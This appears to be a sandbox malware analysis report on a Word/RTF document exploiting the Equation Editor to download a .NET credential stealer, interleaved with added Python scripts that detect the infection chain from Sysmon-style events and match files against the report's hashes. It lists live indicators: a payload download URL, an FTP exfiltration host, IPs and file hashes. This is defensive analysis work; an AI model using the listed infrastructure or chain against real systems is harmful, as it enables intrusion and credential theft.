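INSTALLUTIL_REAL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
VBC = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

# Constructed Sysmon-style events (1 = process create, 3 = network connect, 11 = file create)
# modelled on the graph above; not real telemetry. EQNEDT32.EXE is started by COM activation,
# not as a child of WINWORD.EXE, which is why the graph shows it at top level; the rules
# therefore key on the editor itself rather than on Word as the parent.
EVENTS = [
    {"id": 1, "pid": 1100, "ppid": 900, "image": WINWORD, "parent": r"C:\Windows\explorer.exe"},
    {"id": 1, "pid": 1200, "ppid": 700, "image": EQNEDT, "parent": r"C:\Windows\System32\svchost.exe"},
    {"id": 3, "pid": 1200, "image": EQNEDT, "dst": "103.255.237.180", "dport": 80},
    {"id": 11, "pid": 1200, "image": EQNEDT, "target": NAME_EXE},
    {"id": 1, "pid": 1776, "ppid": 1200, "image": NAME_EXE, "parent": EQNEDT},
    {"id": 3, "pid": 1776, "image": NAME_EXE, "dst": "142.250.203.100", "dport": 443},
    {"id": 11, "pid": 1776, "image": NAME_EXE, "target": INSTALLUTIL_COPY},
    {"id": 1, "pid": 2964, "ppid": 1776, "image": INSTALLUTIL_COPY, "parent": NAME_EXE},
    {"id": 3, "pid": 2964, "image": INSTALLUTIL_COPY, "dst": "45.141.152.18", "dport": 21},
    {"id": 1, "pid": 3001, "ppid": 2964, "image": VBC, "parent": INSTALLUTIL_COPY},
    {"id": 1, "pid": 3002, "ppid": 2964, "image": VBC, "parent": INSTALLUTIL_COPY},
    # Benign controls: the framework's own InstallUtil.exe run by an installer, and Word on TLS.
    {"id": 1, "pid": 4100, "ppid": 4000, "image": INSTALLUTIL_REAL, "parent": r"C:\Windows\System32\msiexec.exe"},
    {"id": 3, "pid": 1100, "image": WINWORD, "dst": "13.107.21.200", "dport": 443},
]


def _base(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _in_user_dir(path: str) -> bool:
    return any(seg in path.lower() for seg in USER_WRITABLE)


def _in_dotnet_dir(path: str) -> bool:
    return any(seg in path.lower() for seg in DOTNET_DIRS)


@dataclass(frozen=True)
class Alert:
    rule: str
    pid: int
    image: str
    detail: str


def detect(events) -> list:
    """Apply the rules to Sysmon-style events and return every alert that fires."""
    alerts = []
    for e in events:
        img, par = _base(e["image"]), _base(e.get("parent", ""))
        if e["id"] == 1:
            if par == "eqnedt32.exe":
                # Equation Editor has no business launching children: this is the
                # CVE-2017-11882 / CVE-2018-0802 exploitation pattern the report names.
                alerts.append(Alert("eqnedt32_spawns_process", e["pid"], e["image"], f"parent={e['parent']}"))
            if img == "installutil.exe" and not _in_dotnet_dir(e["image"]):
                alerts.append(Alert("installutil_outside_framework_dir", e["pid"], e["image"], "relocated .NET utility"))
            if img in DOTNET_COMPILERS and _in_user_dir(e.get("parent", "")):
                # vbc.exe/csc.exe started by a binary in a user-writable directory: the
                # classic hollowing target for credential-stealer stubs.
                alerts.append(Alert("dotnet_compiler_from_user_dir_parent", e["pid"], e["image"], f"parent={e['parent']}"))
        elif e["id"] == 3:
            if img == "eqnedt32.exe":
                alerts.append(Alert("eqnedt32_network", e["pid"], e["image"], f"{e['dst']}:{e['dport']}"))
            if e["dport"] == 21 and _in_user_dir(e["image"]):
                alerts.append(Alert("ftp_from_user_dir_binary", e["pid"], e["image"], f"{e['dst']}:{e['dport']}"))
        elif e["id"] == 11:
            tgt = e["target"]
            if img == "eqnedt32.exe" and (_base(tgt).endswith((".exe", ".dll", ".scr")) or _in_user_dir(tgt)):
                alerts.append(Alert("eqnedt32_drops_file", e["pid"], e["image"], tgt))
    return alerts


def ancestry(events, pid: int) -> list:
    """Walk process-create events upward from pid and return the chain of image names."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    chain = []
    while pid in procs:
        chain.append(_base(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"{a.rule:40} pid={a.pid:<5} {a.image}  ({a.detail})")
    print("ancestry of 3001:", " <- ".join(ancestry(EVENTS, 3001)))
```

The parent-chain walk is what turns seven individual alerts into one incident: every vbc.exe instance resolves back through the %TEMP% InstallUtil.exe copy and name.exe to EQNEDT32.EXE, while the benign InstallUtil.exe run from the framework directory and Word's own TLS traffic fire nothing.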

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
280072109764552.doc | 31% | ReversingLabs | Document-RTF.Trojan.Heuristic
280072109764552.doc | 100% | Avira | HEUR/Rtf.Malformed

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\name.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exe | 13% | ReversingLabs | Win32.Trojan.Wacatac
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | 0% | Metadefender | -
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | 0% | ReversingLabs | -
C:\Users\user\AppData\Roaming\name.exe | 13% | ReversingLabs | Win32.Trojan.Wacatac

Unpacked PE Files

Source | Detection | Scanner | Label
7.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1125438
5.2.InstallUtil.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
5.2.InstallUtil.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
4.2.name.exe.3682b02.11.unpack | 100% | Avira | TR/Inject.vcoldi
4.2.name.exe.3489f22.7.unpack | 100% | Avira | TR/Inject.vcoldi

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://ns.adobe.c/s | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://pki.goog/gsr2/GTS1O1.crt0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://n.f | 0% | Avira URL Cloud | safe
https://pki.goog/repository/0 | 0% | URL Reputation | safe
http://ns.adobede | 0% | Avira URL Cloud | safe
http://ftp.vngpack.com | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://ns.ao | 0% | URL Reputation | safe
http://crl.pki.goog/GTS1O1core.crl0 | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://crl.pki.goog/gsr2/gsr2.crl0? | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
vecvietnam.com.vn | 103.255.237.180 | true | true | - | unknown
www.google.com | 142.250.203.100 | true | false | - | high
ftp.vngpack.com | 45.141.152.18 | true | true | - | unknown
3.246.11.0.in-addr.arpa | unknown | unknown | true | - | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://ns.adobe.c/s | name.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmp, name.exe, 00000004.00000002.2150294891.0000000005113000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/server1.crl0 | name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | false | - | high
http://ocsp.entrust.net03 | name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://pki.goog/gsr2/GTS1O1.crt0 | name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://n.f | name.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://pki.goog/repository/0 | name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://schema.org/WebPage | name.exe, 00000004.00000002.2141909608.0000000002481000.00000004.00000001.sdmp | false | - | high
http://ns.adobede | name.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ftp.vngpack.com | InstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com | name.exe, 00000004.00000002.2141833047.0000000002441000.00000004.00000001.sdmp | false | - | high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | name.exe, 00000004.00000002.2150758062.0000000005CA0000.00000002.00000001.sdmp | false | - | high
http://ns.ao | name.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.pki.goog/GTS1O1core.crl0 | name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://whatismyipaddress.com/- | name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp | false | - | high
https://www.google.com/accounts/servicelogin | vbc.exe | false | - | high
http://www.%s.comPA | name.exe, 00000004.00000002.2150758062.0000000005CA0000.00000002.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2374162693.00000000081A0000.00000002.00000001.sdmp, vbc.exe, 00000007.00000002.2180304316.00000000028B0000.00000002.00000001.sdmp | false | URL Reputation: safe | low
https://login.yahoo.com/config/login | vbc.exe | false | - | high
http://www.site.com/logs.php | InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp | false | - | high
http://crl.pki.goog/gsr2/gsr2.crl0? | name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://www.nirsoft.net/ | vbc.exe | false | - | high
http://ocsp.entrust.net0D | name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | name.exe, 00000004.00000002.2141833047.0000000002441000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp | false | - | high
https://secure.comodo.com/CPS0 | name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | false | - | high
https://www.google.com/ | name.exe, 00000004.00000002.2141833047.0000000002441000.00000004.00000001.sdmp | false | - | high
http://crl.entrust.net/2048ca.crl0 | name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp | false | - | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
142.250.203.100 | www.google.com | United States | 15169 | GOOGLEUS | false
103.255.237.180 | vecvietnam.com.vn | Viet Nam | 45899 | VNPT-AS-VNVNPTCorpVN | true
45.141.152.18 | ftp.vngpack.com | Romania | 9009 | M247GB | true

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 455555
Start date: 28.07.2021
Start time: 17:00:20
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 57s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 280072109764552.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winDOC@10/15@5/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 19.7% (good quality ratio 16.4%)
• Quality average: 68.5%
• Quality standard deviation: 37.8%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 131.253.33.200, 13.107.22.200
• Excluded domains from analysis (whitelisted): www.bing.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, dual-a-0001.a-msedge.net, www-bing-com.dual-a-0001.a-msedge.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
17:00:42 | API Interceptor | 100x Sleep call for process: EQNEDT32.EXE modified
17:00:47 | API Interceptor | 154x Sleep call for process: name.exe modified
17:01:05 | API Interceptor | 209x Sleep call for process: InstallUtil.exe modified
17:01:21 | API Interceptor | 18x Sleep call for process: vbc.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              103.255.237.180G0ESHzsrvg.exeGet hashmaliciousBrowse
                                              • www.sukien-freefire12.com/8rg4/?Ktx=VFDTfh06mkJPRzHspKepKHMYsbk6CR7QazJOU8Mb+pCLTj8Wok+dDdp+Lip1alFcm5QC4IbarA==&OtNDOP=wXOLMFD0PT3lc
                                              6OUYcd3GIs.exeGet hashmaliciousBrowse
                                              • www.sukien-freefire12.com/8rg4/?lJBtHN_=VFDTfh06mkJPRzHspKepKHMYsbk6CR7QazJOU8Mb+pCLTj8Wok+dDdp+Lil1J1Jf/pQU&_jrxqz=kzrxU82
                                              45.141.152.18Confirmarea platii.pdf.exeGet hashmaliciousBrowse
                                              • alfawood.us/xsclk/index.php
                                              Confirmarea platii.pdf.exeGet hashmaliciousBrowse
                                              • alfawood.us/mkdgs/index.php
                                              e-dekont.html.exeGet hashmaliciousBrowse
                                              • alfawood.us/mkdgs/index.php
                                              Credit Advice -TT6635993652908.PDF.exeGet hashmaliciousBrowse
                                              • alfawood.us/mkdgs/index.php
                                              Dekont.pdf.exeGet hashmaliciousBrowse
                                              • alfawood.us/xsclk/index.php
                                              Dekont.pdf.exeGet hashmaliciousBrowse
                                              • blkgrupdoom.info/scgn/index.php
                                              e-dekont.html.exeGet hashmaliciousBrowse
                                              • blkgrupdoom.info/scgn/index.php
                                              Dekont.pdf.exeGet hashmaliciousBrowse
                                              • blkgrupdoom.info/scgn/index.php

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              ftp.vngpack.comypBoHI5G3x.exeGet hashmaliciousBrowse
                                              • 45.141.152.18

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              VNPT-AS-VNVNPTCorpVNqvQglSnF3PGet hashmaliciousBrowse
                                              • 123.27.157.193
                                              Js07W5pNr7Get hashmaliciousBrowse
                                              • 14.167.158.195
                                              Ares.arm7Get hashmaliciousBrowse
                                              • 14.239.124.58
                                              yO5PTymk2ZGet hashmaliciousBrowse
                                              • 14.228.128.114
                                              Mozi.mGet hashmaliciousBrowse
                                              • 14.184.163.135
                                              Mozi.mGet hashmaliciousBrowse
                                              • 14.240.105.71
                                              tj2Fh7pIaRGet hashmaliciousBrowse
                                              • 14.250.58.48
                                              qvngtTJzmJGet hashmaliciousBrowse
                                              • 14.180.176.228
                                              LyJM38hR62Get hashmaliciousBrowse
                                              • 14.229.104.4
                                              qU7VOJ667IGet hashmaliciousBrowse
                                              • 14.254.104.187
                                              hHatuKSDpIGet hashmaliciousBrowse
                                              • 113.169.107.76
                                              7eBFEaTKdBGet hashmaliciousBrowse
                                              • 14.241.250.35
                                              j1zDAEIWibGet hashmaliciousBrowse
                                              • 113.176.89.1
                                              8xVa4UKUerGet hashmaliciousBrowse
                                              • 14.179.19.42
                                              U9ZCIleOACGet hashmaliciousBrowse
                                              • 14.185.47.132
                                              DO3yEscfl8Get hashmaliciousBrowse
                                              • 113.191.160.248
                                              skhubz22bYGet hashmaliciousBrowse
                                              • 14.190.83.164
                                              BPQAfGRL9rGet hashmaliciousBrowse
                                              • 14.172.19.107
                                              EM7kj9300xGet hashmaliciousBrowse
                                              • 203.178.35.203
                                              27iqIAFu9eGet hashmaliciousBrowse
                                              • 14.180.21.26
M247GBqvQglSnF3P, Detection: malicious
• 38.206.128.109
Purchase confirmation-6232.xlsm, Detection: malicious
• 5.61.62.225
ypBoHI5G3x.exe, Detection: malicious
• 45.141.152.18
82658.exe, Detection: malicious
• 45.141.152.18
lLc1G9C259, Detection: malicious
• 185.206.229.147
vTHj1xits9, Detection: malicious
• 38.206.10.73
cNqgk3ITHS, Detection: malicious
• 38.207.37.118
nNb9qLGPaO, Detection: malicious
• 185.158.248.209
2N1tt5eaCn, Detection: malicious
• 161.123.233.98
AttachedWaybill.exe, Detection: malicious
• 37.120.138.210
UAbJbUWQVk.exe, Detection: malicious
• 89.45.4.101
NHnpjXX0sb, Detection: malicious
• 196.17.120.85
Paidcheck.pdf.exe, Detection: malicious
• 217.138.212.57
List_to_clear_62237.xlsm, Detection: malicious
• 5.61.62.219
List_to_clear_62237.xlsm, Detection: malicious
• 5.61.62.219
87597.exe, Detection: malicious
• 45.141.152.18
NJrrXRv8zV, Detection: malicious
• 196.19.8.206
DpuO7oic9y.exe, Detection: malicious
• 86.106.143.143
download.dat.exe, Detection: malicious
• 194.187.251.163
WindowsFormsApp1.exe, Detection: malicious
• 194.187.251.163

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match: 05af1f5ca1b87cc9cc9b25185115607d
ORDER -ASLF1SR00116 40HC 21T05 DALIAN TO GENOVA..doc, Detection: malicious
• 142.250.203.100
Current Vendor Payment Application .doc, Detection: malicious
• 142.250.203.100
sbf 0127365_8106.xlsm, Detection: malicious
• 142.250.203.100
filled_table_revise_it-81443.xlsm, Detection: malicious
• 142.250.203.100
ORDER -ASLF1SR00116-PDF.doc, Detection: malicious
• 142.250.203.100
Purchase confirmation-6232.xlsm, Detection: malicious
• 142.250.203.100
Remittance Advise.doc, Detection: malicious
• 142.250.203.100
IMG PO 012807_32X.doc, Detection: malicious
• 142.250.203.100
Invoice_41292673.xlsm, Detection: malicious
• 142.250.203.100
Invoice_41292673.xlsm, Detection: malicious
• 142.250.203.100
Invoice_94145565.xlsm, Detection: malicious
• 142.250.203.100
PB T2 new.docx, Detection: malicious
• 142.250.203.100
PO-invoice5737747.doc, Detection: malicious
• 142.250.203.100
USD_SLIP.docx, Detection: malicious
• 142.250.203.100
Order _ 08201450.doc, Detection: malicious
• 142.250.203.100
PO.2100002.xlsx, Detection: malicious
• 142.250.203.100
11.docx, Detection: malicious
• 142.250.203.100
Item_positions_invoice-541956.xlsm, Detection: malicious
• 142.250.203.100
Item_positions_receipt_564965.xlsm, Detection: malicious
• 142.250.203.100
Document02.doc, Detection: malicious
• 142.250.203.100

Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
Match: C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Paiement de facture.doc, Detection: malicious
ORDER SPECIFICATION.doc, Detection: malicious
UPSSHIPMENT_CONFIRMATION_CBJ19051700013_11Z35Q6Q80446518864888.doc, Detection: malicious
UPSSHIPMENT_CONFIRMATION_CBJ19051700013_11Z35Q6Q80446518864.doc, Detection: malicious
Quotations73280126721_Oriental_Fastech_Manufacturing.doc, Detection: malicious
PurchaseOrder78902AprilOrderNewRoundBars.doc, Detection: malicious
PO_701_36_01_27.doc, Detection: malicious
IMG_51067.doc__.rtf, Detection: malicious
New Order 09022021.doc, Detection: malicious
deliverysorders.doc, Detection: malicious
IMG_Scanned_67022.doc, Detection: malicious
ORD005271444_0.doc, Detection: malicious
INV00004423.doc, Detection: malicious
DTBT760087673.doc, Detection: malicious
IMG_33687.doc, Detection: malicious
IMG_1660392.doc, Detection: malicious
Purchase Order No. 3109 Dated 28.01.2021.doc, Detection: malicious
Order_130577.doc, Detection: malicious
IMG-79108.doc, Detection: malicious
IMG-6661.doc, Detection: malicious

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exe
Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:downloaded
Size (bytes):1383936
Entropy (8bit):6.545078865817934
Encrypted:false
SSDEEP:24576:inGai6Dban0+uhHJQNmj3X2rhK1+pSRs/8Mz3g:T6iuNH261Rs/
MD5:FA0A3ED04EEC65D6D3FB55AA7D2497C1
SHA1:89AAFE0CFEC4ECC13FD7F255B1E6E8AF903DDBD0
SHA-256:2C6DF9A84B482C1DD1AF8EE142CCDFEAB23234A8507F3CC637AEE9161A6C58B8
SHA-512:DA69F632F0BC9789BF17D1CFDBF09C991098227A23E3BD273C1C5720B53D9EB81B99C0121F632CBC2EB25ECE51E6548470DC2FD0ED64D37F88A58A005B1C7B3D
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 13%
Reputation:low
IE Cache URL:http://vecvietnam.com.vn/xpen3/09867654270721.PDF.exe
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....<.............................)... ...@....@.. ....................................`.................................|)..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........1..............................................................J.j......1X...n}..|.0._.foa..^%M..$C1..p..4.......].....0s.(.......I:..l.*.+D.W..u..qN|,.I.V.Ht.'....jg Um..F.]..&..D..}./..`....!9...wq.v..:..9.!Y.....C:vz..v8...<..o....[.v.?[g ....\...~.U&^ueW..L......D.w.e7.V..7G.3tr................ .|....x..-..].<.k....4..S....3\....g.U!...o..P6{.."..hH...=./.5..'A.M.o..`.$j.K8."......D.6.v...u[..V-a!...#?.x...O'.+N./..9s}..J.k)@.E.z.-...I..cv.../..&
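The per-file fields in these entries (MD5/SHA-1/SHA-256/SHA-512, "Entropy (8bit)", and the "MZ ... PE..L" preview that identifies a PE image) can all be recomputed offline, which is how a responder checks whether a file recovered from a host is one of the artifacts this report lists. The script below is an added example for this page and is not code from the Joe Sandbox report: the two hash sets in REPORT_IOCS are copied from the entries for 09867654270721.PDF[1].exe and InstallUtil.exe; the function names, the minimal PE stub and the other sample inputs are constructed here for demonstration.

```python
"""Recompute the report's per-file fingerprint fields and match a file
against the dropped-file hashes it lists. Added example; the IOC hashes are
copied from this report, everything else is constructed for demonstration."""
import hashlib
import math
import sys
from collections import Counter

# Hashes copied from the "Created / dropped Files" entries of this report.
REPORT_IOCS = [
    {
        "name": "09867654270721.PDF[1].exe (downloaded by EQNEDT32.EXE)",
        "size": 1383936,
        "md5": "fa0a3ed04eec65d6d3fb55aa7d2497c1",
        "sha256": "2c6df9a84b482c1dd1af8ee142ccdfeab23234a8507f3cc637aee9161a6c58b8",
    },
    {
        "name": "InstallUtil.exe (dropped by name.exe)",
        "size": 41136,
        "md5": "bb85aa6d90a4157ed799257072b265ff",
        "sha256": "815fd29d891cb94418bb0cdc44d5095230989fe9da58421319fcd57e458e39a9",
    },
]


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the quantity the
    report prints as "Entropy (8bit)". Empty input yields 0.0."""
    if not data:
        return 0.0
    n = len(data)
    entropy = 0.0
    for count in Counter(data).values():
        p = count / n
        entropy -= p * math.log2(p)
    return entropy


def is_pe(data: bytes) -> bool:
    """True if the bytes start with an MZ stub whose e_lfanew (offset 0x3C)
    points at a 'PE\\0\\0' signature, i.e. what the report's
    "MZ ... This program cannot be run in DOS mode ... PE..L" previews show."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def fingerprint(data: bytes) -> dict:
    """Every per-file field of the report that can be computed offline."""
    return {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "is_pe": is_pe(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha512": hashlib.sha512(data).hexdigest(),
    }


def match_iocs(data: bytes, iocs=REPORT_IOCS) -> list:
    """Names of IOCs whose MD5 or SHA-256 equals that of `data`. Size is only
    a sanity check: a hash match with a different size indicates a bad IOC."""
    fp = fingerprint(data)
    hits = []
    for ioc in iocs:
        if fp["sha256"] == ioc["sha256"] or fp["md5"] == ioc["md5"]:
            if fp["size"] != ioc["size"]:
                print(f"warning: size mismatch for {ioc['name']}", file=sys.stderr)
            hits.append(ioc["name"])
    return hits


def build_minimal_pe_stub() -> bytes:
    """Constructed input: a 64-byte MZ header with e_lfanew = 0x40 followed
    by a PE signature. Enough for is_pe(); not a runnable executable."""
    header = bytearray(b"MZ" + b"\0" * 0x3E)
    header[0x3C:0x40] = (0x40).to_bytes(4, "little")
    return bytes(header) + b"PE\0\0" + b"\0" * 20


def scan_file(path: str) -> dict:
    """Fingerprint a file on disk and attach any IOC matches."""
    with open(path, "rb") as fh:
        data = fh.read()
    result = fingerprint(data)
    result["ioc_matches"] = match_iocs(data)
    return result


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for key, value in scan_file(sys.argv[1]).items():
            print(f"{key}: {value}")
    else:
        # Constructed demo inputs; the 2-byte UTF-16LE BOM has the size and
        # entropy (1.0) the report lists for holderwb.txt.
        for label, sample in [("pe stub", build_minimal_pe_stub()),
                              ("utf16 bom", b"\xff\xfe"),
                              ("zeros", b"\0" * 1024)]:
            fp = fingerprint(sample)
            print(f"{label}: size={fp['size']} entropy={fp['entropy']:.3f} "
                  f"pe={fp['is_pe']} matches={match_iocs(sample)}")
```

Run it with a path to fingerprint a suspect file; with no argument it prints the fields for the constructed inputs. Matching is on MD5 or SHA-256 because vendor feeds often carry only one of the two; the 8-bit entropy is reported alongside because packed or encrypted payloads typically sit above 7, whereas the downloaded .NET dropper above scores 6.5.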
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{238E66D8-299E-4B99-A605-44EE5B79BCDD}.tmp
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1024
Entropy (8bit):0.05390218305374581
Encrypted:false
SSDEEP:3:ol3lYdn:4Wn
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
Reputation:high, very likely benign file
Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B83DDB5-D064-451A-A615-F9D5A3E063B2}.tmp
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1536
Entropy (8bit):1.35503378748317
Encrypted:false
SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbq:IiiiiiiiiifdLloZQc8++lsJe1Mzp
MD5:3205DD73710421B95A8AF86F27D81253
SHA1:02A295749B1613B87042B49C12E1FCC8D0EC532C
SHA-256:833259425C29070C37939264C63C138B04116B98E315E4A49B32488539E96AA5
SHA-512:48F6DC9FBACDEC454524F8CFBA1DF124236098D8AED22BB0D8664B872F1F182CB5ECBABBAE42718C2A922BF57F7452F7D44ECDFE613CA2ADFEF058840E7C6F8F
Malicious:false
Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E2185495-5638-43A1-A616-4B202C23444A}.tmp
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
